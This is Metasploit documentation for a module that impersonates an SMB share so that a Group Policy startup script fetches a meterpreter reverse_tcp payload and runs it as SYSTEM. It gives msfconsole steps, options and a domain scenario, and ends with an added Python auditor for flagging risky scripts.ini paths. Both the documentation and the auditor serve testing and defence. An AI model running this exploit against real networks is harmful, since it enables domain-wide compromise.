Path: blob/master/documentation/modules/exploit/windows/smb/group_policy_startup.md
## Vulnerable Application

This is a general-purpose module for exploiting systems where Windows Group Policy is configured to load VBS startup/logon scripts from a remote location. The module serves an SMB share that delivers a payload through a VBS file. Startup scripts are executed with SYSTEM privileges, while logon scripts are executed with the privileges of the logging-on user. The attacker still needs to redirect the target's traffic to the fake SMB share for the exploit to succeed.

Note that in some cases it can take 5 to 10 minutes to receive a session.

More information is available from Gotham Digital Science Security.
## Verification Steps

1. Start `msfconsole`
2. Do: `use exploit/windows/smb/group_policy_startup`
3. Do: `exploit`
## Options

**FILE_NAME**

VBS file name to share (default: a random `.vbs` name)

**FOLDER_NAME**

Folder name to share (default: none)

**SHARE**

Share name (default: random)
## Scenarios

### Domain Group Policy

In this scenario, the following computers are present:

- Windows 7 (x64, Build 7601, SP1): Victim
- Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller

The module sets up the SMB share and the VBScript file. Out of band (outside the scope of this module and its documentation), a Group Policy is applied to the computer container of the OU. On its next boot, the Windows 7 host fetches the payload, in this case the meterpreter reverse_tcp stager, and runs it with SYSTEM privileges because it is executed as a startup script. Any other computer in that OU would likewise execute the script at startup.
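The misconfiguration the module relies on (a Group Policy startup/logon script whose path points at a share outside the domain's own SYSVOL/NETLOGON) can be audited from the `scripts.ini` files that GPMC writes under `Policies\{GUID}\Machine\Scripts` and `User\Scripts`. The following is an added example, not part of the module or its documentation; the sample `scripts.ini` is constructed and its domain, GUID, host and share names are placeholders.

```python
import codecs
import configparser
import re
from pathlib import Path

# Scripts on the domain's own SYSVOL/NETLOGON shares are the expected case;
# any other UNC path is a remote share that can be impersonated.
TRUSTED_UNC = re.compile(r"^\\\\[^\\]+\\(sysvol|netlogon)\\", re.IGNORECASE)

# Constructed scripts.ini in the layout GPMC writes: NCmdLine/NParameters pairs
# under [Startup]/[Shutdown] (machine policy) or [Logon]/[Logoff] (user policy).
# Domain, GUID, host and share names are placeholders.
SAMPLE_SCRIPTS_INI = """\
[Startup]
0CmdLine=\\\\corp.example\\SysVol\\corp.example\\Policies\\{GUID}\\Machine\\Scripts\\Startup\\inventory.vbs
0Parameters=
1CmdLine=\\\\fileserver01\\share\\deploy.vbs
1Parameters=/quiet
[Logon]
0CmdLine=C:\\Scripts\\mapdrives.vbs
0Parameters=
"""


def find_remote_scripts(ini_text):
    """Return (section, index, path) for every script loaded from a UNC path off SYSVOL/NETLOGON."""
    # interpolation=None keeps values such as %SystemRoot% literal
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(ini_text)
    findings = []
    for section in cp.sections():
        for key, value in cp.items(section):  # configparser lower-cases keys
            m = re.fullmatch(r"(\d+)cmdline", key)
            if not m:
                continue
            path = value.strip().strip('"')
            if path.startswith("\\\\") and not TRUSTED_UNC.match(path):
                findings.append((section, int(m.group(1)), path))
    return findings


def audit_scripts_ini(path):
    """Audit one scripts.ini on disk; GPMC writes it as UTF-16 with a BOM, older files may be ANSI."""
    raw = Path(path).read_bytes()
    if raw[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE):
        return find_remote_scripts(raw.decode("utf-16"))
    return find_remote_scripts(raw.decode("latin-1"))
```

To sweep a whole domain, run `audit_scripts_ini` over `Path(policies_root).glob("*/*/Scripts/scripts.ini")` against a copy of the SYSVOL `Policies` folder; local paths such as `C:\...` are not flagged because they are not fetched over the network.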